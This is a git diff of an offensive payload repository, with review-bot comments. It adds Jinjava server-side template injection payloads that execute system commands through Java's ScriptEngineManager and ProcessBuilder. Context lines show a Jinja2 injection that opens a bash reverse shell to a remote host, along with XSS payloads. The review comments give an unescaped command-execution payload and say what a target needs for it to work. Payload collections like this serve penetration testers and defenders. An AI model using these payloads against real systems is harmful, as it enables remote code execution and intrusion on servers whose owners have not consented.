@@ -211,6 +215,33 @@ Inject this template {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host ``` +## Jinjava + + +### Jinjava - Basic injection + +```python +{{'a'.toUpperCase()}} would result in 'A' +{{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206 +``` + +Jinjava is an open source project developped by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/) + +### Jinjava - Command execution + +Fixed by https://github.com/HubSpot/jinjava/pull/230 + +```python +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}} + +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}} + +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} + + +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} +``` + ## Client Side Template Injection ### AngularJS @@ -226,7 +257,7 @@ $eval('1+1') {{constructor.constructor('alert(1)')()}} ``` -## Thanks to +## References * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) * [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/) 
@@ -235,4 +266,5 @@ $eval('1+1') * [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf) * [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/) * [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti) -* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad) \ No newline at end of file +* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad) +* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw) \ No newline at end of file diff --git a/Tar commands execution/README.md b/Tar commands execution/README.md index 7e863cb..5b40859 100644 --- a/Tar commands execution/README.md +++ b/Tar commands execution/README.md @@ -12,7 +12,7 @@ These files work against a "tar *" shell.sh (your exploit code is here) ``` -## Thanks to +## References * [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/) * [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/) diff --git a/Traversal directory/README.md b/Traversal directory/README.md index d0c7f28..ac2d856 100644 --- a/Traversal directory/README.md +++ b/Traversal directory/README.md @@ -43,6 +43,6 @@ UTF-8 Unicode encoding \ = %c0%5c, %c0%80%5c ``` -## Thanks to +## References * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack) diff --git a/Upload insecure files/README.md b/Upload insecure files/README.md index 006ad44..ab2d9a9 100644 
--- a/Upload insecure files/README.md +++ b/Upload insecure files/README.md @@ -59,6 +59,6 @@ IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); ``` -## Thanks to +## References * Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil diff --git a/Web cache deception/README.md b/Web cache deception/README.md index 3e59cf3..7c81e96 100644 --- a/Web cache deception/README.md +++ b/Web cache deception/README.md @@ -50,7 +50,7 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page ``` -## Thanks to +## References * [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html) * [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning) diff --git a/XPATH injection/README.md b/XPATH injection/README.md index 33dc2ad..4b2eddc 100644 --- a/XPATH injection/README.md +++ b/XPATH injection/README.md @@ -33,7 +33,7 @@ substring(//user[userid=5]/username,2,1)=CHAR_HERE substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) ``` -## Thanks to +## References * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)) * [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/) diff --git a/XSS injection/README.md b/XSS injection/README.md index 3ce0402..b6d7078 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md 
@@ -859,7 +859,7 @@ Notification.requestPermission(x=>{new(Notification)(1)}) Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//) -## Thanks to +## References - [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot) - tbm diff --git a/XSS injection/XSS in Angular.md b/XSS injection/XSS in Angular.md index 85c1076..5e7ea66 100644 --- a/XSS injection/XSS in Angular.md +++ b/XSS injection/XSS in Angular.md @@ -149,6 +149,6 @@ Vue JS {{constructor.constructor('alert(1)')()}} ``` -## Thanks +## References -- [](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs) \ No newline at end of file +- [XSS without HTML - CSTI with Angular JS - Portswigger](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs) \ No newline at end of file diff --git a/XSS injection/XSS with Relative Path Overwrite.md b/XSS injection/XSS with Relative Path Overwrite.md index ad488c2..d837908 100644 --- a/XSS injection/XSS with Relative Path Overwrite.md +++ b/XSS injection/XSS with Relative Path Overwrite.md @@ -42,3 +42,8 @@ From : `http://www.thespanner.co.uk/2014/03/21/rpo/` ``` IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute. + + +## References + +- [TODO](TODO) \ No newline at end of file diff --git a/XXE injection/README.md b/XXE injection/README.md index f85289f..554bdb0 100644 --- a/XXE injection/README.md +++ b/XXE injection/README.md @@ -188,7 +188,7 @@ JPG (experimental) GIF (experimental) ``` -## Thanks to +## References * [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing) * [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)
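Review bot: the new `## Methodology` image in `Server Side Template injections/README.md` is embedded through an absolute `https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/...?raw=true` URL; a relative path (`Images/serverside.png`) renders in forks, mirrors and offline checkouts and survives a rename of the default branch. Also confirm that `Images/serverside.png` is part of this commit, since none of the hunks shown adds it.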
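Review bot: in the `Jinjava - Command execution` block the payloads carry two levels of escaping (`eval(\"...\")` and `x.command(\\\"whoami\\\")`), which is how the strings look inside a JSON or shell-quoted request body rather than as a raw template expression; either show the unescaped form, e.g. `{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval("var x=new java.lang.ProcessBuilder; x.command(\"whoami\"); x.start()")}}`, or state which transport the escaping is for. Two caveats belong in the section: `org.apache.commons.io.IOUtils.toString(...)` only works when commons-io is on the target's classpath, and `getEngineByName('JavaScript')` depends on the Nashorn engine, which is absent from JDK 15 and later, so the call returns null there and the payload fails. Minor: `developped` should be `developed`; the line `Fixed by https://github.com/HubSpot/jinjava/pull/230` should name the first fixed release so readers know which versions are affected; and the `Jinjava - Basic injection` fence mixes prose (`would result in 'A'`, `would return a request object like ...`) into the payload block, so move the expected output into a comment or a sentence after the fence.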
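Review bot: the reference added to `Server Side Template injections/README.md`, `https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw`, carries a `?spref=tw` share-tracking parameter; drop it so the stored URL is canonical. The file also still ends without a newline (`\ No newline at end of file` on both sides of the hunk); since this hunk already rewrites the last line, add the trailing newline here.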
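Review bot: `- tbm` under the renamed `## References` heading in `XSS injection/README.md` is a bare handle with no title or link, unlike the `Unleashing-an-Ultimate-XSS-Polyglot` entry above it; while this hunk touches the heading, either give the entry a link and description in the same `- [title](url)` form or move the credit out of the reference list.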
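Review bot: in `XSS injection/XSS in Angular.md` the filled-in link text spells the vendor `Portswigger`; the product name is `PortSwigger`. The file still ends without a trailing newline (`\ No newline at end of file`), which this hunk could fix since it rewrites the last line.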
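Review bot: `- [TODO](TODO)` in `XSS injection/XSS with Relative Path Overwrite.md` commits a placeholder link under the new `## References` heading. The section just above already attributes the material with `From : http://www.thespanner.co.uk/2014/03/21/rpo/`, so cite that, e.g. `- [RPO - thespanner.co.uk](http://www.thespanner.co.uk/2014/03/21/rpo/)`, or leave the heading out until a real reference exists; either way the new last line should end with a newline rather than `\ No newline at end of file`.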